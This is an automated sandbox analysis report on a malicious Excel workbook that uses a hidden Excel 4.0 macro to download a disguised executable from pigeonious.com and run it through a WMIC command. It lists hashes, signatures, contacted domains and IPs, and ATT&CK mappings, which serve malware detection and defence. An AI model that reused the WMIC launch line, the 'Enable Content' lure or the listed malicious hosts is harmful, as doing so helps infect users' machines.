Analysis Report Current-Status-062021-81197.xlsb

Overview

General Information

Sample Name: Current-Status-062021-81197.xlsb
Analysis ID: 432839
MD5: 1ac719c744d22f42e4978e7b55828435
SHA1: 4ddc7358f615987bf92ed9192430693db65b097c
SHA256: d9be275feff4b3383821b1483ba93424fb27aa40e138da41a91511193d9538cb

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to create processes via WMI
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7076 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 2460 cmdline: wmic process call create 'C:/Users/Public/SettingSyncHost' MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • SettingSyncHost (PID: 1808 cmdline: C:/Users/Public/SettingSyncHost MD5: 526D56017EF5105277FE0D366C95C39D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: wmic process call create 'C:/Users/Public/SettingSyncHost', CommandLine: wmic process call create 'C:/Users/Public/SettingSyncHost', CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7076, ProcessCommandLine: wmic process call create 'C:/Users/Public/SettingSyncHost', ProcessId: 2460

    Signature Overview

    AV Detection:

    Multi AV Scanner detection for domain / URL
    Source: injuryless.com, Virustotal: Detection: 7%
    Multi AV Scanner detection for dropped file
    Source: C:\Users\Public\SettingSyncHost, ReversingLabs: Detection: 17%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png, ReversingLabs: Detection: 17%
    Multi AV Scanner detection for submitted file
    Source: Current-Status-062021-81197.xlsb, Virustotal: Detection: 8%
    Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png, Joe Sandbox ML: detected
    Source: C:\Users\Public\SettingSyncHost, Joe Sandbox ML: detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknown, HTTPS traffic detected: 95.142.44.93:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 193.178.169.243:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb source: SettingSyncHost
    Source: Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb5 source: SettingSyncHost, 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
    Source: C:\Users\Public\SettingSyncHost, Code function: 5_2_003CCEB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,5_2_003CCEB0
    Source: C:\Users\Public\SettingSyncHost, Code function: 5_2_003EA7D5 FindFirstFileExW,5_2_003EA7D5

    Software Vulnerabilities:

    Document exploit detected (drops PE files)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: logo[1].png.0.dr
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Section loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\wbem\WMIC.exe
    Source: global traffic, DNS query: name: pigeonious.com
    Source: global traffic, TCP traffic: 192.168.2.4:49734 -> 95.142.44.93:443
    Source: Joe Sandbox View, ASN Name: VDSINA-ASRU VDSINA-ASRU
    Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: C:\Users\Public\SettingSyncHost, Code function: 5_2_003D7CF0 InternetReadFile,5_2_003D7CF0
    Source: unknown, DNS traffic detected: queries for: pigeonious.com
    Source: hats.xml, String found in binary or memory: https://pigeonious.com/img/logo.png
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownHTTPS traffic detected: 95.142.44.93:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 193.178.169.243:443 -> 192.168.2.4:49739 version: TLS 1.2

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 8Screenshot OCR: Enable Editing" " and then "Enable Content" button. 22 23 24 25 26 27 28 " " 29 30 31 32
    Source: Screenshot number: 8Screenshot OCR: Enable Content" button. 22 23 24 25 26 27 28 " " 29 30 31 32 33 34 ConMecmal j 2021 US
    Contains functionality to create processes via WMI
    Source: WMIC.exe, 00000003.00000002.671294038.0000000002DB0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create 'C:/Users/Public/SettingSyncHost'C:\Windows\System32\Wbem\wmic.exeWinSta0\Default
    Found abnormal large hidden Excel 4.0 Macro sheet
    Source: Current-Status-062021-81197.xlsbInitial sample: Sheet size: 480182
    Office process drops PE file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncHost
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png
    Source: C:\Users\Public\SettingSyncHostProcess Stats: CPU usage > 98%
    Source: Joe Sandbox ViewDropped File: C:\Users\Public\SettingSyncHost 28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png 28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
    Source: C:\Users\Public\SettingSyncHostCode function: String function: 0039A560 appears 45 times
    Source: C:\Users\Public\SettingSyncHostCode function: String function: 003D9730 appears 55 times
    Source: classification engineClassification label: mal100.expl.evad.winXLSB@5/8@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_01
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3950737C-20D7-4D17-885E-2145A276803C} - OProcSessId.dat
    Source: C:\Users\Public\SettingSyncHostCommand line argument: P(:5_2_003A27A0
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\Public\SettingSyncHostFile read: C:\Windows\System32\drivers\etc\hosts
    Source: Current-Status-062021-81197.xlsbVirustotal: Detection: 8%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create 'C:/Users/Public/SettingSyncHost'
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Users\Public\SettingSyncHost C:/Users/Public/SettingSyncHost
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Current-Status-062021-81197.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb source: SettingSyncHost
    Source: Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb5 source: SettingSyncHost, 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00391070 LoadLibraryA,GetProcAddress,GetProcAddress,5_2_00391070
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003FC0E5 push esi; ret 5_2_003FC0EE
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003C8149 push eax; ret 5_2_003C8179
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003C81C8 push eax; ret 5_2_003C8179
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_0039A5A5 push ecx; ret 5_2_0039A5B8
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003F5CA5 push ecx; ret 5_2_003F5CB8
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003FAF39 pushad ; iretd 5_2_003FAF3D

    Persistence and Installation Behavior:

    Creates processes via WMI
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncHost
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncHost
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003DAAF8 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_003DAAF8
    Source: C:\Windows\SysWOW64\wbem\WMIC.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\SettingSyncHostCode function: GetAdaptersInfo,GetAdaptersInfo,5_2_003CBB10
    Source: C:\Users\Public\SettingSyncHostAPI coverage: 7.3 %
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003CCEB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,5_2_003CCEB0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003EA7D5 FindFirstFileExW,5_2_003EA7D5
    Source: WMIC.exe, 00000003.00000002.672546333.0000000003280000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW/
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
    Source: WMIC.exe, 00000003.00000002.672546333.0000000003280000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: WMIC.exe, 00000003.00000002.672546333.0000000003280000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: WMIC.exe, 00000003.00000002.672546333.0000000003280000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\Public\SettingSyncHostProcess information queried: ProcessInformation
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00399082 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00399082
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00391070 LoadLibraryA,GetProcAddress,GetProcAddress,5_2_00391070
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003E105A mov eax, dword ptr fs:[00000030h]5_2_003E105A
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00391FE0 mov eax, dword ptr fs:[00000030h]5_2_00391FE0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003EA4CE mov eax, dword ptr fs:[00000030h]5_2_003EA4CE
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003A045E VirtualQuery,GetModuleFileNameW,GetPdbDll,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,5_2_003A045E
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D9ABA SetUnhandledExceptionFilter,5_2_003D9ABA
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003DE083 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_003DE083
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003B024E SetUnhandledExceptionFilter,5_2_003B024E
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D94F2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_003D94F2
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D9957 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_003D9957
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_00393C21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00393C21
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: SettingSyncHost, 00000005.00000002.1526637809.0000000001470000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: SettingSyncHost, 00000005.00000002.1526637809.0000000001470000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: SettingSyncHost, 00000005.00000002.1526637809.0000000001470000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: SettingSyncHost, 00000005.00000002.1526637809.0000000001470000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D9776 cpuid 5_2_003D9776
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,5_2_003E901B
    Source: C:\Users\Public\SettingSyncHostCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_0039B006
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesW,5_2_003EE095
    Source: C:\Users\Public\SettingSyncHostCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_0039B0F2
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesA,5_2_0039B0C8
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_003EE120
    Source: C:\Users\Public\SettingSyncHostCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_0039B159
    Source: C:\Users\Public\SettingSyncHostCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_0039B195
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,5_2_003AC281
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,5_2_003EE373
    Source: C:\Users\Public\SettingSyncHostCode function: __crtGetLocaleInfoA_stat,5_2_003AC35B
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_003EE499
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,5_2_003EE59F
    Source: C:\Users\Public\SettingSyncHostCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_00398594
    Source: C:\Users\Public\SettingSyncHostCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_003EE66E
    Source: C:\Users\Public\SettingSyncHostCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_003988B2
    Source: C:\Users\Public\SettingSyncHostCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_00397908
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesW,5_2_003E8AF9
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoA,5_2_0039AADA
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0039AC3E
    Source: C:\Users\Public\SettingSyncHostCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,5_2_00398C12
    Source: C:\Users\Public\SettingSyncHostCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,5_2_003A1C0F
    Source: C:\Users\Public\SettingSyncHostCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_0039AD33
    Source: C:\Users\Public\SettingSyncHostCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_003EDD0D
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoA,___ascii_strnicmp,__tolower_l,__tolower_l,5_2_003A2D8A
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_0039ADDA
    Source: C:\Users\Public\SettingSyncHostCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_0039AE35
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoA,5_2_003A2EBF
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesW,5_2_003EDFAF
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesW,5_2_003EDFFA
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003930E0 GetLocalTime,@_RTC_CheckStackVars@8,5_2_003930E0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003CBF90 SHGetFolderPathA,GetUserNameA,GetComputerNameExA,5_2_003CBF90

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Windows Management Instrumentation 21 | Application Shimming 1 | Application Shimming 1 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scripting 1 | Boot or Logon Initialization Scripts | Process Injection 2 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Native API 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 1 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | Exploitation for Client Execution 33 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | System Information Discovery 24 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Command and Scripting Interpreter 2 | Network Logon Script | Network Logon Script | Masquerading 121 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 2 | Cached Domain Credentials | Security Software Discovery 121 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Network Configuration Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    Current-Status-062021-81197.xlsb | 8% | Virustotal |  | Browse
    Current-Status-062021-81197.xlsb | 2% | ReversingLabs |  |

    Dropped Files

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png | 100% | Joe Sandbox ML |  |
    C:\Users\Public\SettingSyncHost | 100% | Joe Sandbox ML |  |
    C:\Users\Public\SettingSyncHost | 17% | ReversingLabs |  |
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png | 17% | ReversingLabs |  |

    Unpacked PE Files

    No Antivirus matches

    Domains

    Source | Detection | Scanner | Label | Link
    injuryless.com | 8% | Virustotal |  | Browse

    URLs


    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    injuryless.com | 193.178.169.243 | true | true |  | unknown
    pigeonious.com | 95.142.44.93 | true | false |  | unknown

    URLs from Memory and Binaries

                                                                                                            https://injuryless.com/XSettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://outlook.office.com/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                high
                                                                                                                https://injuryless.com/id=124406_ECF4BBEA1588SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
